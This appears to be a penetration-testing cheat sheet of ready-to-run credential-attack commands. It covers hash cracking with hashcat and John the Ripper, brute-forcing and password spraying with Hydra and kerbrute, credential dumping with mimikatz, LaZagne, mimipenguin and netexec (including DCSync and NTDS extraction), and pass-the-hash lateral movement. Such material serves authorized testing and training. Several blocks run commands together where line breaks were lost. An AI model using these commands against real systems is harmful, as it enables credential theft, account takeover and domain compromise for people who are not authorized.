# Quick hash cracking
hashcat --identify hash.txt && hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt --force
hashcat -m 0 md5_hash /PATH/TO/WORDLIST # MD5
hashcat -m 100 sha1_hash /PATH/TO/WORDLIST # SHA-1
hashcat -m 1400 sha256_hash /PATH/TO/WORDLIST # SHA-256
hashcat -m 1800 sha512_hash /PATH/TO/WORDLIST # SHA-512
hashcat -m 1000 ntlm_hash /PATH/TO/WORDLIST # NTLM
hashcat -m 3200 bcrypt_hash /PATH/TO/WORDLIST # bcrypt
hashcat -m 5600 netntlmv2 /PATH/TO/WORDLIST # NetNTLMv2
| Mode | Hash Type |
|---|---|
| 0 | MD5 |
| 100 | SHA1 |
| 1000 | NTLM |
| 1800 | SHA-512 (Unix) |
| 3200 | bcrypt |
| 5600 | NetNTLMv2 |
| 13100 | Kerberoast (TGS-REP) |
| 18200 | ASREPRoast |
hashcat -m 13100 hashes.kerberoast /PATH/TO/WORDLIST -r /usr/share/hashcat/rules/best64.rule --forcehashcat -m 18200 hashes.asreproast /PATH/TO/WORDLIST -r /usr/share/hashcat/rules/best64.rule --forceecho '$1' > custom.rule # Append "1"
echo 'c' >> custom.rule # Capitalize first letter
echo '$!' >> custom.rule # Append "!"
hashcat -m 0 hash.txt wordlist.txt -r custom.rule
| Rule | Description | Example | Input → Output |
|---|---|---|---|
| : | Do nothing | : | password → password |
| l | Lowercase all | l | PassWord → password |
| u | Uppercase all | u | password → PASSWORD |
| c | Capitalize first | c | password → Password |
| C | Lowercase first, upper rest | C | passWORD → pASSWORD |
| t | Toggle case | t | password → PASSWORD |
| TN | Toggle at position N | T2 | password → paSsword |
| r | Reverse | r | password → drowssap |
| d | Duplicate | d | pass → passpass |
| $X | Append char X | $1 | pass → pass1 |
| ^X | Prepend char X | ^! | pass → !pass |
| [ | Delete first char | [ | password → assword |
| ] | Delete last char | ] | password → passwor |
| DN | Delete at position N | D3 | password → pasword |
| iNX | Insert X at position N | i4! | password → pass!word |
| oNX | Overwrite at N with X | o1@ | pass → p@ss |
| sXY | Replace X with Y | sa@ | password → p@ssword |
| @X | Remove all X | @a | password → pssword |
| xNM | Extract M chars from N | x04 | password → pass |
| p | Duplicate word | p | pass → passpass |
| z | Duplicate first char | z2 | pass → pppass |
| Z | Duplicate last char | Z2 | pass → passss |
| q | Duplicate every char | q | abc → aabbcc |
| 'N | Truncate at N | '5 | password → passw |
# Capitalize + append numbers
echo 'c$1' > custom.rule
echo 'c$2' >> custom.rule
echo 'c$1$2$3' >> custom.rule
# Capitalize + special chars
echo 'c$!' >> custom.rule
echo 'c$@' >> custom.rule
echo 'c$#' >> custom.rule
# Leet speak substitutions
echo 'sa@se3si1so0' > leet.rule
# Year append
echo '$2$0$2$4' > years.rule
echo '$2$0$2$5' >> years.rule# Kali Linux paths
/usr/share/hashcat/rules/best64.rule # Fast, good results
/usr/share/hashcat/rules/rockyou-30000.rule
/usr/share/hashcat/rules/d3ad0ne.rule # Comprehensive
/usr/share/hashcat/rules/dive.rule # Very large
/usr/share/hashcat/rules/OneRuleToRuleThemAll.rule
# Chain multiple rules
hashcat -m 1000 hash.txt wordlist.txt -r rule1.rule -r rule2.rulehashcat --identify --user <FILE>
hashcat --example-hashes | grep -i "ntlm"john <FILE> --wordlist=/PATH/TO/WORDLIST
john <FILE> --rules --wordlist=/PATH/TO/WORDLIST
john --show <FILE>keepass2john database.kdbx > keepass_hash.txt
ssh2john id_rsa > ssh_hash.txt
zip2john file.zip > zip_hash.txt
rar2john file.rar > rar_hash.txt
pdf2john file.pdf > pdf_hash.txt
| Tool | Usage | Example |
|---|---|---|
| keepass2john | KeePass database | keepass2john database.kdbx > hash.txt |
| ssh2john | SSH private key | ssh2john id_rsa > hash.txt |
| zip2john | ZIP archive | zip2john file.zip > hash.txt |
| rar2john | RAR archive | rar2john file.rar > hash.txt |
| pdf2john | PDF file | pdf2john file.pdf > hash.txt |
| office2john | MS Office | office2john file.docx > hash.txt |
| bitlocker2john | BitLocker | bitlocker2john -i image.dd > hash.txt |
| pfx2john | PFX/PKCS12 | pfx2john cert.pfx > hash.txt |
| gpg2john | GPG key | gpg2john private.key > hash.txt |
| wpapcap2john | WPA handshake | wpapcap2john capture.cap > hash.txt |
| truecrypt2john | TrueCrypt | truecrypt2john volume.tc > hash.txt |
| pwsafe2john | Password Safe | pwsafe2john database.psafe3 > hash.txt |
| 1password2john | 1Password | 1password2john data.1pif > hash.txt |
| lastpass2john | LastPass | lastpass2john vault.csv > hash.txt |
| ethereum2john | Ethereum wallet | ethereum2john wallet.json > hash.txt |
| bitcoin2john | Bitcoin wallet | bitcoin2john wallet.dat > hash.txt |
# Use rules
john hash.txt --wordlist=/PATH/TO/WORDLIST --rules=best64
john hash.txt --wordlist=/PATH/TO/WORDLIST --rules=KoreLogicRulesAppend
# Common rule files
/usr/share/john/rules/best64.rule
/usr/share/john/rules/InsidePro-PasswordsPro.rulejohn hash.txt --wordlist=/PATH/TO/WORDLIST --format=Raw-SHA256
john hash.txt --wordlist=/PATH/TO/WORDLIST --format=NThydra $rhost -l <USERNAME> -P /PATH/TO/WORDLIST <PROTOCOL>
hydra $rhost -L /PATH/TO/USERS -P /PATH/TO/WORDLIST <PROTOCOL>
hydra $rhost -C /PATH/TO/COMBO ftp # user:pass combo filehydra $rhost -l <USERNAME> -P /PATH/TO/WORDLIST http-post-form "/login.php:username=^USER^&password=^PASS^:Invalid"
hydra $rhost -l admin -P /PATH/TO/WORDLIST http-post-form "/admin.php:username=^USER^&password=^PASS^:login_error"hydra -l <USERNAME> -P /PATH/TO/WORDLIST ssh://$rhost
hydra -L users.txt -P /PATH/TO/WORDLIST ssh://$rhost -t 4hydra -l <USERNAME> -P /PATH/TO/WORDLIST ftp://$rhosthydra -l <USERNAME> -P /PATH/TO/WORDLIST smb://$rhostexport HYDRA_PROXY=connect://127.0.0.1:8080./kerbrute userenum -d $domain --dc $rhost /PATH/TO/USERNAMES./kerbrute passwordspray -d $domain --dc $rhost /PATH/TO/USERNAMES <PASSWORD>.\mimikatz.exe
privilege::debugsekurlsa::logonpasswords
sekurlsa::wdigest
sekurlsa::kerberos
sekurlsa::tickets /exportlsadump::sam
lsadump::secrets
lsadump::cachelsadump::dcsync /user:<DOMAIN>\Administrator
lsadump::dcsync /user:<DOMAIN>\krbtgttoken::elevate
token::revert
kerberos::ptt <TICKET>.kirbi
Understanding where credentials are stored in LSASS memory
| DLL | Description | Credentials Stored |
|---|---|---|
| Lsasrv.dll | LSA Server service | Enforces security policies |
| Msv1_0.dll | NTLM Authentication | NTLM hashes |
| Samsrv.dll | SAM Database | Local account hashes |
| Kerberos.dll | Kerberos Authentication | Kerberos tickets, AES keys |
| Tspkg.dll | Terminal Services SSP | Clear-text credentials (RDP) |
| Wdigest.dll | Digest Authentication | Clear-text passwords (if enabled) |
| Credman.dll | Credential Manager | Saved credentials |
| Ntdsa.dll | AD Domain Services | NTDS.dit (domain controller only) |
| Cloudap.dll | Azure AD Auth | Cloud credentials (Windows 10+) |
:: SAM/SYSTEM/SECURITY locations
C:\Windows\System32\config\SAM
C:\Windows\System32\config\SYSTEM
C:\Windows\System32\config\SECURITY
:: NTDS.dit (Domain Controller)
C:\Windows\NTDS\ntds.dit
Credential recovery tool - retrieves passwords stored on the local computer from browsers, databases, mail clients, wifi, git, SSH keys, and more.
# Launch all modules
laZagne.exe all
# Launch only browser passwords
laZagne.exe browsers
# Launch specific software
laZagne.exe browsers -firefox
# Output to file
laZagne.exe all -oN
laZagne.exe all -oA -output C:\Users\test\Desktop
# Quiet mode with file output
laZagne.exe all -quiet -oA
# With known password (for domain credentials)
laZagne.exe all -password <PASSWORD>
# Verbose mode
laZagne.exe all -vvpython3 laZagne.py all
python3 laZagne.py browsers
python3 laZagne.py sysadmin
python3 laZagne.py wifi# With password (required for most credentials)
python3 laZagne.py all --password <PASSWORD>
# Interactive mode (prompts for password)
python3 laZagne.py all -i
| Category | Examples |
|---|---|
| browsers | Chrome, Firefox, Edge, Opera |
| mails | Outlook, Thunderbird |
| databases | PostgreSQL, SQLdeveloper |
| sysadmin | FileZilla, WinSCP, OpenSSH, PuTTY, KeePass config |
| wifi | Wireless network passwords |
| git | Git credentials |
Mimikatz-style tool for Linux - dumps cleartext credentials from memory. Requires root.
# Bash version
sudo ./mimipenguin.sh
# Python version
sudo python3 mimipenguin.py
# C binary (faster)
sudo ./mimipenguinmake
# or static binary
make static
| Target | Description |
|---|---|
| GDM | Kali/Debian desktop |
| Gnome Keyring | Ubuntu, ArchLinux desktop |
| LightDM | Ubuntu desktop |
| VSFTPd | Active FTP connections |
| Apache2 | HTTP Basic Auth sessions |
| OpenSSH | Active SSH sessions (sudo usage) |
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>'
nxc smb $rhost -u '<USERNAME>' -H '<HASH>'
nxc winrm $rhost -u '<USERNAME>' -p '<PASSWORD>'
nxc ldap $rhost -u '<USERNAME>' -p '<PASSWORD>'
nxc mssql $rhost -u '<USERNAME>' -p '<PASSWORD>'nxc smb $rhost -u '' -p ''
nxc smb $rhost -u ' ' -p ' 'nxc smb $rhost -u users.txt -p '<PASSWORD>' --continue-on-success
nxc smb $rhost -u users.txt -p passwords.txt --no-bruteforce --continue-on-successnxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --sam
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --lsa
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --ntdsnxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --shares
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --shares -M spider_plus
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --shares -M spider_plus -o DOWNLOAD_FLAG=truenxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' -x 'whoami'
nxc winrm $rhost -u '<USERNAME>' -p '<PASSWORD>' -X 'Get-Process'nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --rid-brute
nxc smb $rhost -u '<USERNAME>' -p '<PASSWORD>' --rid-brute | grep 'SidTypeUser' | awk '{print $6}'
For complete ASREPRoast attack details, see Kerberos Attacks - ASREPRoast
nxc ldap $rhost -u '<USERNAME>' -p '<PASSWORD>' --asreproast hashes.asreproast
For complete Kerberoasting attack details, see Kerberos Attacks - Kerberoasting
nxc ldap $rhost -u '<USERNAME>' -p '<PASSWORD>' --kerberoasting hashes.kerberoasting
pypykatz lsa minidump lsass.dmp
pypykatz registry --sam sam system
fcrackzip -u -D -p /PATH/TO/WORDLIST <FILE>.zip
Crack KeePass database master password
keepass2john Database.kdbx > keepass.hash
# Remove filename prefix if needed
# $keepass$*... -> just the hash part# Mode 13400 = KeePass 1/2 AES/Twofish
hashcat -m 13400 keepass.hash /PATH/TO/WORDLIST
# With rules
hashcat -m 13400 keepass.hash /PATH/TO/WORDLIST -r /usr/share/hashcat/rules/rockyou-30000.rule --forcejohn keepass.hash --wordlist=/PATH/TO/WORDLIST
john --show keepass.hash
Crack encrypted SSH private key passphrase
ssh2john id_rsa > ssh.hash
# Remove filename prefix if needed
# id_rsa:$sshng$... -> just $sshng$...# Add custom rules to /etc/john/john.conf
[List.Rules:sshRules]
c $1 $3 $7 $!
c $1 $3 $7 $@
c $1 $3 $7 $## With custom rules
john --wordlist=passwords.txt --rules=sshRules ssh.hash
# Standard wordlist
john ssh.hash --wordlist=/PATH/TO/WORDLIST
john --show ssh.hashchmod 600 id_rsa
ssh -i id_rsa user@$rhost# Extract hash from password-protected ZIP
zip2john protected.zip > zip.hash
# Crack with john
john zip.hash --wordlist=/PATH/TO/WORDLIST
john --show zip.hash# Excel, Word, PowerPoint files
office2john document.docx > office.hash
office2john spreadsheet.xlsx > office.hash
john office.hash --wordlist=/PATH/TO/WORDLISTpdf2john protected.pdf > pdf.hash
john pdf.hash --wordlist=/PATH/TO/WORDLISTrar2john protected.rar > rar.hash
john rar.hash --wordlist=/PATH/TO/WORDLIST7z2john protected.7z > 7z.hash
john 7z.hash --wordlist=/PATH/TO/WORDLISTgpg2john private.key > gpg.hash
john gpg.hash --wordlist=/PATH/TO/WORDLISTpfx2john certificate.pfx > pfx.hash
john pfx.hash --wordlist=/PATH/TO/WORDLIST# Extract from macOS keychain
keychain2john login.keychain-db > keychain.hash
john keychain.hash --wordlist=/PATH/TO/WORDLIST# Extract BitLocker recovery key hash
bitlocker2john -i /dev/sdb1 > bitlocker.hash
john bitlocker.hash --wordlist=/PATH/TO/WORDLIST
Extract metadata from files - can reveal usernames, software versions, etc.
# View all metadata
exiftool file.pdf
exiftool image.jpg
exiftool document.docx
# Extract specific fields
exiftool -Author -Creator -Producer file.pdf
# Recursive scan directory
exiftool -r /path/to/directory
# Output to file
exiftool -csv -r /path/to/directory > metadata.csv# Extract readable strings from binary files
strings file.exe | grep -i password
strings file.exe | grep -i user
Crack Windows NTLM hashes from SAM/LSASS
# Using mimikatz
.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"# Mode 1000 = NTLM
hashcat -m 1000 ntlm.hash /PATH/TO/WORDLIST
# With rules
hashcat -m 1000 ntlm.hash /PATH/TO/WORDLIST -r /usr/share/hashcat/rules/best64.rule --force
For complete Pass-the-Hash techniques with all tools, see Lateral Movement - Pass the Hash
| Tool | Command |
|---|---|
| impacket-psexec | impacket-psexec -hashes :NTLM_HASH Administrator@$rhost |
| impacket-wmiexec | impacket-wmiexec -hashes :NTLM_HASH Administrator@$rhost |
| netexec | nxc smb $rhost -u Administrator -H NTLM_HASH |
| evil-winrm | evil-winrm -i $rhost -u Administrator -H NTLM_HASH |
Moved to dedicated file: NTLM Relay & Responder
Covers: Responder setup, ntlmrelayx, relay targets discovery, and full attack chains.
- AD Exploitation - ACL Abuse, GPO Abuse, AD CS attacks
- Kerberos Attacks - ASREPRoast, Kerberoasting, Golden/Silver Tickets
- NTLM Relay & Responder - Responder, NTLM Relay attacks
- Lateral Movement - Pass the Hash, Pass the Ticket in action
- Wordlist Guide - Username generation, wordlist creation